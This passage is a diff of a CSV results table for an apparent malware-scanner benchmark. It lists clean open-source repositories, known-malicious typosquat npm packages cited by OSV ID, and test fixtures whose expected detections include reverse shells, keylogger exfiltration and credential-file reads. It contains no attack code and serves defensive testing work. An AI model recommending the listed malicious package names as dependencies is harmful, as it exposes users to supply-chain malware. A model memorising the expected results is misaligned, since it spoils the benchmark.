-"noisy-oven-sh-bun","noisy-legitimate","reference-clean","Expanded commit-pinned reference corpus","https://github.com/oven-sh/bun","8f1a9540fdff25410506de76e0da2506d260c08f","","","low","completed","true","true","true","low","0.18","true","OBFUSCATED_CODE | OBF_EVAL | HARDCODED_SECRETS | CODE_INTEGRITY_ISSUE","medium | medium | medium | medium","medium | low | medium | low","","200","17929","false","4040","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" -"noisy-tauri-apps-tauri","noisy-legitimate","reference-clean","Expanded commit-pinned reference corpus","https://github.com/tauri-apps/tauri","f5347cd70838c027040acb4a66733a2470f20ae4","","","low","completed","true","true","true","low","0.2175","true","OBFUSCATED_CODE | SUSPICIOUS_FILE_ACCESS | HARDCODED_SECRETS","medium | medium | medium | medium","low | medium | medium | medium","","133","948","false","3368","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" -"noisy-puppeteer-puppeteer","noisy-legitimate","reference-clean","Expanded commit-pinned reference corpus","https://github.com/puppeteer/puppeteer","5f5f931a0f2bc64bfb30039c507d763ce044c263","","","low","completed","true","true","true","low","0.1275","true","OBF_EVAL | EXFIL_CLIPBOARD | OBF_SETTIMEOUT_STRING","medium | medium | medium | medium | medium","low | low | medium | low | low","","200","2016","false","4027","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" -"noisy-microsoft-typescript","noisy-legitimate","reference-clean","Expanded commit-pinned reference corpus","https://github.com/microsoft/TypeScript","637d5746b70257028fb95aad32ddec6b26ab0a14","","","low","completed","true","true","true","low","0.075","true","OBF_BASE64_HEAVY | OBFUSCATED_CODE | OBF_EVAL | OBF_NEW_FUNCTION | NETWORK_COMMUNICATION","medium | medium | medium | medium | medium | medium | medium | medium | medium | medium | medium | medium | medium | medium | medium | medium | medium","low | low | low | low | low | low | low | low | low | low | low | low | low | low | low | low | low","","200","53109","true","7952","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" -"noisy-npm-cli","noisy-legitimate","reference-clean","Expanded commit-pinned reference corpus","https://github.com/npm/cli","7b1f6c173d17b3bf30e45426f6df39473c6a1163","","","low","completed","true","true","true","low","0.09","true","HARDCODED_SECRETS","medium | medium | medium","medium | medium | medium","","200","6701","false","3841","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" -"noisy-homebrew-brew","noisy-legitimate","reference-clean","Expanded commit-pinned reference corpus","https://github.com/Homebrew/brew","76ca8d74e4a180badad438bf245ddfc740d68a8e","","","low","completed","true","true","true","low","0.09","true","SUSPICIOUS_FILE_ACCESS","medium","medium","","200","2970","false","3802","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" -"noisy-python-cpython","noisy-legitimate","reference-clean","Expanded commit-pinned reference corpus","https://github.com/python/cpython","1fece4457032382947c7c2a5c9e95dc106ca7a7d","","","low","completed","true","true","true","low","0.165","true","OBF_BASE64_HEAVY | OBF_NEW_FUNCTION | OBFUSCATED_CODE | OBF_HEX_STRINGS | DATA_EXFILTRATION | NETWORK_COMMUNICATION | CODE_INTEGRITY_ISSUE","medium | medium | medium | medium | medium | medium | medium | medium | medium | medium | medium | medium","low | low | medium | low | low | low | low | low | low | low | low | low","","200","5803","false","6846","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" -"noisy-django-django","noisy-legitimate","reference-clean","Expanded commit-pinned reference corpus","https://github.com/django/django","bdbda29c3e126754c3ae04ceb5c5d35d49aae01c","","","low","completed","true","true","true","low","0","true","","","","","200","6874","false","3404","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" -"noisy-ansible-ansible","noisy-legitimate","reference-clean","Expanded commit-pinned reference corpus","https://github.com/ansible/ansible","8d63341579aa1c62024f3bce1a8af3f9a1b22a16","","","low","completed","true","true","true","low","0.1275","true","NETWORK_COMMUNICATION | HARDCODED_SECRETS","medium | medium","low | medium","","200","5591","false","3448","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" -"noisy-scrapy-scrapy","noisy-legitimate","reference-clean","Expanded commit-pinned reference corpus","https://github.com/scrapy/scrapy","c9446931a80e63ea1d77e130ea5581b547e0f51b","","","low","completed","true","true","true","low","0","true","","","","","200","432","false","2634","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" -"noisy-pallets-flask","noisy-legitimate","reference-clean","Expanded commit-pinned reference corpus","https://github.com/pallets/flask","36e4a824f340fdee7ed50937ba8e7f6bc7d17f81","","","low","completed","true","true","true","low","0","true","","","","","107","129","false","2134","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" -"noisy-rust-lang-rust","noisy-legitimate","reference-clean","Expanded commit-pinned reference corpus","https://github.com/rust-lang/rust","5503df87342a73d0c29126a7e08dc9c1255c46ad","","","low","completed","true","true","true","low","0.2025","true","OBF_BASE64_HEAVY | SUSPICIOUS_FILE_ACCESS | NETWORK_COMMUNICATION | DATA_EXFILTRATION","medium | medium | medium | medium | medium | medium | medium | medium | medium | medium","low | medium | medium | low | medium | medium | medium | low | low | low","","200","60050","true","4744","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" -"noisy-golang-go","noisy-legitimate","reference-clean","Expanded commit-pinned reference corpus","https://github.com/golang/go","03845e30f7b73d1703bd8c21017297f6eecb76d6","","","low","completed","true","true","true","low","0","true","","","","","200","15414","false","3653","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" -"malicious-osv-mal-2024-8862","real-malicious","known-malicious-metadata","OpenSSF OSV MAL-2024-8862; report blob cebceb18d12edabb3bf055a6936a367b0614e792","https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/bcrypts-js/MAL-2024-8862.json","osv:1fcca18f1775b47bd272362330684aa2dd1ad870:cebceb18d12edabb3bf055a6936a367b0614e792:7c7ee68d6f6b26b48726c11558dc9206bf998cf9","SUSPICIOUS_DEPENDENCY","high","","completed","true","true","true","high","0.25","false","SUSPICIOUS_DEPENDENCY","high","high","","1","0","false","1","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" -"malicious-osv-mal-2024-1377","real-malicious","known-malicious-metadata","OpenSSF OSV MAL-2024-1377; report blob c78863fed3a5a3b662b72b05c16b77d9dc153665","https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/cors-parser/MAL-2024-1377.json","osv:1fcca18f1775b47bd272362330684aa2dd1ad870:c78863fed3a5a3b662b72b05c16b77d9dc153665:3e4eb5c422572ea85c1fff43d7e1f202899068b3","SUSPICIOUS_DEPENDENCY","high","","completed","true","true","true","high","0.4","false","SUSPICIOUS_DEPENDENCY","critical","high","","1","0","false","0","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" -"malicious-osv-mal-2025-19413","real-malicious","known-malicious-metadata","OpenSSF OSV MAL-2025-19413; report blob 84b9fce13d64dd7ec790910850e9fbbbf58cf348","https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/electorn/MAL-2025-19413.json","osv:1fcca18f1775b47bd272362330684aa2dd1ad870:84b9fce13d64dd7ec790910850e9fbbbf58cf348:d511c4332bf47892ca7bf08a3ad5e06ccc7224fb","SUSPICIOUS_DEPENDENCY","high","","completed","true","true","true","high","0.25","false","SUSPICIOUS_DEPENDENCY","high","high","","1","0","false","0","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" -"malicious-osv-mal-2025-20690","real-malicious","known-malicious-metadata","OpenSSF OSV MAL-2025-20690; report blob 2fdd79a99598980c7c4cbaad70833538b602a95c","https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/flatmap-stream/MAL-2025-20690.json","osv:1fcca18f1775b47bd272362330684aa2dd1ad870:2fdd79a99598980c7c4cbaad70833538b602a95c:faa25eec2f63ebf17e74b3d3dad492afa2bdc214","SUSPICIOUS_DEPENDENCY","high","","completed","true","true","true","high","0.4","false","SUSPICIOUS_DEPENDENCY","critical","high","","1","0","false","0","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" -"malicious-osv-mal-2025-25502","real-malicious","known-malicious-metadata","OpenSSF OSV MAL-2025-25502; report blob 67e0222164b6b5f6ec72ce58d7a20b430cac4dd2","https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/lodahs/MAL-2025-25502.json","osv:1fcca18f1775b47bd272362330684aa2dd1ad870:67e0222164b6b5f6ec72ce58d7a20b430cac4dd2:5ee45d530dcca44dea28a23994dbcdbecfc63f8e","SUSPICIOUS_DEPENDENCY","high","","completed","true","true","true","high","0.4","false","SUSPICIOUS_DEPENDENCY | TYPOSQUAT_PACKAGE","high | medium","high | unspecified","","1","0","false","0","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" -"malicious-osv-mal-2025-4275","real-malicious","known-malicious-metadata","OpenSSF OSV MAL-2025-4275; report blob 238dc228cd9cf54efea67c07f9bc7089b15207b4","https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/axios.js/MAL-2025-4275.json","osv:1fcca18f1775b47bd272362330684aa2dd1ad870:238dc228cd9cf54efea67c07f9bc7089b15207b4:e015c3138480f5286955833abfb3bea47471688d","SUSPICIOUS_DEPENDENCY","high","","completed","true","true","true","high","0.25","false","SUSPICIOUS_DEPENDENCY","high","high","","1","0","false","1","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" -"malicious-osv-mal-2026-4493","real-malicious","known-malicious-metadata","OpenSSF OSV MAL-2026-4493; report blob 366383ef9f8518dfc534b911251a2dbe5ccd3928","https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/axiosqqq/MAL-2026-4493.json","osv:1fcca18f1775b47bd272362330684aa2dd1ad870:366383ef9f8518dfc534b911251a2dbe5ccd3928:bb3d39dbc3518a28407d264f2abcf070c3a3657b","SUSPICIOUS_DEPENDENCY","high","","completed","true","true","true","high","0.25","false","SUSPICIOUS_DEPENDENCY","high","high","","1","0","false","0","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" -"malicious-osv-mal-2025-15242","real-malicious","known-malicious-metadata","OpenSSF OSV MAL-2025-15242; report blob 5850d1f4f2806fd59eb535b3e4d45beb058bc826","https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/axioss/MAL-2025-15242.json","osv:1fcca18f1775b47bd272362330684aa2dd1ad870:5850d1f4f2806fd59eb535b3e4d45beb058bc826:81363d511fb327ca5616ccfcba7c5393e1a0044c","SUSPICIOUS_DEPENDENCY","high","","completed","true","true","true","high","0.4","false","SUSPICIOUS_DEPENDENCY | TYPOSQUAT_PACKAGE","high | medium","high | unspecified","","1","0","false","0","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" -"malicious-osv-mal-2025-15281","real-malicious","known-malicious-metadata","OpenSSF OSV MAL-2025-15281; report blob e6a3d9c6a3d214bff2f326a8f1d8ba8ac8c1d472","https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/babel-laoder/MAL-2025-15281.json","osv:1fcca18f1775b47bd272362330684aa2dd1ad870:e6a3d9c6a3d214bff2f326a8f1d8ba8ac8c1d472:7ae13db475be04ecc7d2b6fcef3b20c40bbc2e03","SUSPICIOUS_DEPENDENCY","high","","completed","true","true","true","high","0.25","false","SUSPICIOUS_DEPENDENCY","high","high","","1","0","false","0","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" -"malicious-osv-mal-2025-15282","real-malicious","known-malicious-metadata","OpenSSF OSV MAL-2025-15282; report blob b23f507de17d8c239290fb1c36a5d9a6d886b92c","https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/babel-loadre/MAL-2025-15282.json","osv:1fcca18f1775b47bd272362330684aa2dd1ad870:b23f507de17d8c239290fb1c36a5d9a6d886b92c:cb4b464cf4c2449f6ad3903bd3e62fbe9c7579dd","SUSPICIOUS_DEPENDENCY","high","","completed","true","true","true","high","0.25","false","SUSPICIOUS_DEPENDENCY","high","high","","1","0","false","0","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" -"malicious-osv-mal-2025-15283","real-malicious","known-malicious-metadata","OpenSSF OSV MAL-2025-15283; report blob a98eafc3406e034fe14c4e2fe25edc21ee7e9a47","https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/babel-loqder/MAL-2025-15283.json","osv:1fcca18f1775b47bd272362330684aa2dd1ad870:a98eafc3406e034fe14c4e2fe25edc21ee7e9a47:b2eee8c6fb943b5b47deffd77c116865d4d2ddee","SUSPICIOUS_DEPENDENCY","high","","completed","true","true","true","high","0.25","false","SUSPICIOUS_DEPENDENCY","high","high","","1","0","false","0","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" -"malicious-osv-mal-2025-15286","real-malicious","known-malicious-metadata","OpenSSF OSV MAL-2025-15286; report blob 7d72739e67fda4b48cc77bfcb6c868feafd17567","https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/babel-node/MAL-2025-15286.json","osv:1fcca18f1775b47bd272362330684aa2dd1ad870:7d72739e67fda4b48cc77bfcb6c868feafd17567:9b2980f27303a4070b0e103b0621839940ee9724","SUSPICIOUS_DEPENDENCY","high","","completed","true","true","true","high","0.25","false","SUSPICIOUS_DEPENDENCY","high","high","","1","0","false","0","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" -"malicious-osv-mal-2025-15289","real-malicious","known-malicious-metadata","OpenSSF OSV MAL-2025-15289; report blob 283dd8d75b91d4a35c89707bd10115e3d2ff9c69","https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/babel-pal/MAL-2025-15289.json","osv:1fcca18f1775b47bd272362330684aa2dd1ad870:283dd8d75b91d4a35c89707bd10115e3d2ff9c69:55744bedf6294386bdc1eec2313e9b485a77322f","SUSPICIOUS_DEPENDENCY","high","","completed","true","true","true","high","0.25","false","SUSPICIOUS_DEPENDENCY","high","high","","1","0","false","0","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" -"malicious-osv-mal-2025-15238","real-malicious","known-malicious-metadata","OpenSSF OSV MAL-2025-15238; report blob aceadeea25bc4b32b766096204db12a15315e090","https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/axios-http/MAL-2025-15238.json","osv:1fcca18f1775b47bd272362330684aa2dd1ad870:aceadeea25bc4b32b766096204db12a15315e090:30af885d0884dd6cec7fdbfb7ba0a3248110b517","SUSPICIOUS_DEPENDENCY","high","","completed","true","true","true","high","0.25","false","SUSPICIOUS_DEPENDENCY","high","high","","1","0","false","1","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" -"malicious-osv-mal-2023-116","real-malicious","known-malicious-metadata","OpenSSF OSV MAL-2023-116; report blob 0d58b457e7175cc230bff6d7b6da40d3781a5466","https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/axios-proxy/MAL-2023-116.json","osv:1fcca18f1775b47bd272362330684aa2dd1ad870:0d58b457e7175cc230bff6d7b6da40d3781a5466:216fcbc2c9356dbccfd103971f088bcb84682b06","SUSPICIOUS_DEPENDENCY","high","","completed","true","true","true","high","0.25","false","SUSPICIOUS_DEPENDENCY","high","high","","1","0","false","0","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" -"malicious-osv-mal-2025-4813","real-malicious","known-malicious-metadata","OpenSSF OSV MAL-2025-4813; report blob bcd00abcd6ee4bb4083f79b6e4d10b6d289aa392","https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/axios-browserify/MAL-2025-4813.json","osv:1fcca18f1775b47bd272362330684aa2dd1ad870:bcd00abcd6ee4bb4083f79b6e4d10b6d289aa392:2bae461ccd66abc5ecc0082b8681a81c125302b6","SUSPICIOUS_DEPENDENCY","high","","completed","true","true","true","high","0.25","false","SUSPICIOUS_DEPENDENCY","high","high","","1","0","false","0","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" -"malicious-osv-mal-2025-190832","real-malicious","known-malicious-metadata","OpenSSF OSV MAL-2025-190832; report blob b9b988a111a6e0915333f4b29ce75fb1fe05f293","https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/axios-builder/MAL-2025-190832.json","osv:1fcca18f1775b47bd272362330684aa2dd1ad870:b9b988a111a6e0915333f4b29ce75fb1fe05f293:6ac5ebe76f27904cfdec2d27badfa7ad53d6f11d","SUSPICIOUS_DEPENDENCY","high","","completed","true","true","true","high","0.25","false","SUSPICIOUS_DEPENDENCY","high","high","","1","0","false","0","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" -"malicious-osv-mal-2024-10692","real-malicious","known-malicious-metadata","OpenSSF OSV MAL-2024-10692; report blob 79cb12c286a16d2f04288db57a43bce0b197d907","https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/axios-mockadptr/MAL-2024-10692.json","osv:1fcca18f1775b47bd272362330684aa2dd1ad870:79cb12c286a16d2f04288db57a43bce0b197d907:4a871bf8d97a4ffd916e71d4102e1a09b3d38d6d","SUSPICIOUS_DEPENDENCY","high","","completed","true","true","true","high","0.25","false","SUSPICIOUS_DEPENDENCY","high","high","","1","0","false","0","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" -"malicious-osv-mal-2025-191389","real-malicious","known-malicious-metadata","OpenSSF OSV MAL-2025-191389; report blob 6bae4d1fc6ab36b3516d10c59910f905e50c4f3a","https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/axios-cancelable/MAL-2025-191389.json","osv:1fcca18f1775b47bd272362330684aa2dd1ad870:6bae4d1fc6ab36b3516d10c59910f905e50c4f3a:5a611b4143b8b29595533761d56448dc59603cd8","SUSPICIOUS_DEPENDENCY","high","","completed","true","true","true","high","0.25","false","SUSPICIOUS_DEPENDENCY","high","high","","1","0","false","0","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" -"malicious-osv-mal-2026-2631","real-malicious","known-malicious-metadata","OpenSSF OSV MAL-2026-2631; report blob d20844f3c5e46ef0707cdad324c86ce0b027a8fa","https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/babel-plugin-blocks/MAL-2026-2631.json","osv:1fcca18f1775b47bd272362330684aa2dd1ad870:d20844f3c5e46ef0707cdad324c86ce0b027a8fa:4f055c91abd296b619826fad2bb36752f7f939a7","SUSPICIOUS_DEPENDENCY","high","","completed","true","true","true","high","0.25","false","SUSPICIOUS_DEPENDENCY","high","high","","1","0","false","0","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" -"malicious-osv-mal-2025-47613","real-malicious","known-malicious-metadata","OpenSSF OSV MAL-2025-47613; report blob 3075fa3df8d2b7a89c816127adda2b9188415350","https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/babel-ganache/MAL-2025-47613.json","osv:1fcca18f1775b47bd272362330684aa2dd1ad870:3075fa3df8d2b7a89c816127adda2b9188415350:2aaacc868e3b819e0e9d4dbb9a9d58b5d83906ff","SUSPICIOUS_DEPENDENCY","high","","completed","true","true","true","high","0.25","false","SUSPICIOUS_DEPENDENCY","high","high","","1","0","false","0","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" -"malicious-osv-mal-2026-407","real-malicious","known-malicious-metadata","OpenSSF OSV MAL-2026-407; report blob 6bbba35a96333e1960acec15928b07c83544e48a","https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/babel-js/MAL-2026-407.json","osv:1fcca18f1775b47bd272362330684aa2dd1ad870:6bbba35a96333e1960acec15928b07c83544e48a:9897f3726f56deb821827c8de18501abead258f2","SUSPICIOUS_DEPENDENCY","high","","completed","true","true","true","high","0.25","false","SUSPICIOUS_DEPENDENCY","high","high","","1","0","false","1","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" -"malicious-osv-mal-2025-15287","real-malicious","known-malicious-metadata","OpenSSF OSV MAL-2025-15287; report blob 910018e9ea790fae8a6c9141550913cf26e5275d","https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/babel-npm-install/MAL-2025-15287.json","osv:1fcca18f1775b47bd272362330684aa2dd1ad870:910018e9ea790fae8a6c9141550913cf26e5275d:8082edb8ce35bdad9a7e5c961b346e42d7d218a3","SUSPICIOUS_DEPENDENCY","high","","completed","true","true","true","high","0.25","false","SUSPICIOUS_DEPENDENCY","high","high","","1","0","false","0","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" -"malicious-osv-mal-2025-15288","real-malicious","known-malicious-metadata","OpenSSF OSV MAL-2025-15288; report blob 4a51f824f7203deffb5fd237dc4105ebfbfeba03","https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/babel-npm-publish/MAL-2025-15288.json","osv:1fcca18f1775b47bd272362330684aa2dd1ad870:4a51f824f7203deffb5fd237dc4105ebfbfeba03:c79c0836d3e4e5c0e39da8e406463977b538d0d7","SUSPICIOUS_DEPENDENCY","high","","completed","true","true","true","high","0.25","false","SUSPICIOUS_DEPENDENCY","high","high","","1","0","false","0","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" -"malicious-osv-mal-2025-3985","real-malicious","known-malicious-metadata","OpenSSF OSV MAL-2025-3985; report blob eb426f1379301192517dbb30aad8a7b4e6993343","https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/babel-loader-fs/MAL-2025-3985.json","osv:1fcca18f1775b47bd272362330684aa2dd1ad870:eb426f1379301192517dbb30aad8a7b4e6993343:655664c120057afcca26233ac537a2622d3d7e2c","SUSPICIOUS_DEPENDENCY","high","","completed","true","true","true","high","0.25","false","SUSPICIOUS_DEPENDENCY","high","high","","1","0","false","0","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"sample_id","corpus","label","label_source","source_url","immutable_ref","expected_detection_category","minimum_expected_verdict","maximum_expected_verdict","status","test_passed","category_detected","verdict_pass","actual_verdict","actual_score","safe_to_clone","rules_triggered","finding_severities","finding_confidences","false_positive_notes","files_scanned","files_skipped","tree_truncated","duration_ms","engine_version","engine_commit_sha","detection_rules_version","error" +"critical-keylogger-exfil-v1","critical-fixture","known-malicious-structure","Flagrix claimed behavior: keyboard capture plus network sink","https://github.com/flagrix-io/flagrix-detection-rules","fixture-v1:47ddfcaf4652dcead3194f3be5f4bdc8e1b43742","EXFIL_KEYLOGGER","high","","completed","true","true","true","high","0.4","false","EXFIL_KEYLOGGER","critical","high","","1","0","false","17","0.3.0","","2026.07.12.003","" +"critical-beavertail-loader-v1","critical-fixture","known-malicious-structure","Flagrix claimed Lazarus BeaverTail loader structure","https://github.com/flagrix-io/flagrix-detection-rules","fixture-v1:cd28e14b93bd48d8fc52714787299569897f6408","BEAVERTAIL_LOADER_V1","high","","completed","true","true","true","high","0.4","false","BEAVERTAIL_LOADER_V1","critical","high","","1","0","false","3","0.3.0","","2026.07.12.003","" +"critical-env-exfil-v1","critical-fixture","known-malicious-structure","Flagrix claimed environment-variable exfiltration structure","https://github.com/flagrix-io/flagrix-detection-rules","fixture-v1:11214d0e6bf271f10d443bf17c16d83232e2f297","BEAVERTAIL_EXFIL","high","","completed","true","true","true","high","0.4","false","BEAVERTAIL_EXFIL","critical","high","","1","0","false","1","0.3.0","","2026.07.12.003","" +"critical-reverse-shell-v1","critical-fixture","known-malicious-structure","Flagrix claimed reverse-shell socket structure","https://github.com/flagrix-io/flagrix-detection-rules","fixture-v1:feff0e223beffb7e78b88ad496ff6f96c1871028","REVERSE_SHELL","high","","completed","true","true","true","high","0.4","false","REVERSE_SHELL","critical","high","","1","0","false","1","0.3.0","","2026.07.12.003","" +"critical-crypto-miner-v1","critical-fixture","known-malicious-structure","Flagrix claimed cryptocurrency-miner endpoint structure","https://github.com/flagrix-io/flagrix-detection-rules","fixture-v1:09955ea0b3c26412934cd61e99cc25a921f8c943","CRYPTO_MINER","high","","completed","true","true","true","high","0.4","false","CRYPTO_MINER","critical","high","","1","0","false","1","0.3.0","","2026.07.12.003","" +"critical-obfuscated-eval-v1","critical-fixture","known-malicious-structure","Flagrix claimed Base64-decoded dynamic execution structure","https://github.com/flagrix-io/flagrix-detection-rules","fixture-v1:3f60ed22624352d562b694600d87f7a37bf81fe3","OBFUSCATED_EVAL","medium","","completed","true","true","true","high","0.4375","false","OBFUSCATED_EVAL | OBF_EVAL","critical | medium","high | low","","1","0","false","1","0.3.0","","2026.07.12.003","" +"critical-rce-endpoint-v1","critical-fixture","known-malicious-structure","Flagrix claimed request-driven remote-code-execution structure","https://github.com/flagrix-io/flagrix-detection-rules","fixture-v1:e4084292f92b05d88db1c0b433a74ab63e8ff3ca","BACKDOOR_RCE_ENDPOINT","high","","completed","true","true","true","high","0.4375","false","BACKDOOR_RCE_ENDPOINT | OBF_EVAL","critical | medium","high | low","","1","0","false","1","0.3.0","","2026.07.12.003","" +"critical-credential-file-read-v1","critical-fixture","known-malicious-structure","Flagrix claimed credential-file access structure","https://github.com/flagrix-io/flagrix-detection-rules","fixture-v1:895568b6b685834b3d6cf7186308ccc7f23f3cbe","FILE_ACCESS_CREDENTIALS","high","","completed","true","true","true","high","0.4","false","FILE_ACCESS_CREDENTIALS","critical","high","","1","0","false","0","0.3.0","","2026.07.12.003","" +"critical-aws-key-v1","critical-fixture","known-malicious-structure","Flagrix claimed AWS access-key pattern using a reserved dummy value","https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_identifiers.html","fixture-v1:ab32de596974e481f402ba256ae69b9cf9ce9e76","HARDCODED_AWS_KEY","high","","completed","true","true","true","high","0.4","false","HARDCODED_AWS_KEY","critical","high","","1","0","false","0","0.3.0","","2026.07.12.003","" +"critical-install-script-v1","critical-fixture","known-malicious-structure","Flagrix claimed install-time download and dynamic execution structure","https://github.com/flagrix-io/flagrix-scanner-core","fixture-v1:611f7347091fa4506e2f4ef8884a30fd011f7314","POSTINSTALL_SCRIPT","high","","completed","true","true","true","high","0.4","false","POSTINSTALL_SCRIPT","high | critical","unspecified | unspecified","","1","0","false","0","0.3.0","","2026.07.12.003","" +"reference-fixture-keyboard-shortcut-v1","reference-fixture","reference-clean","Regression control for ordinary keyboard UI 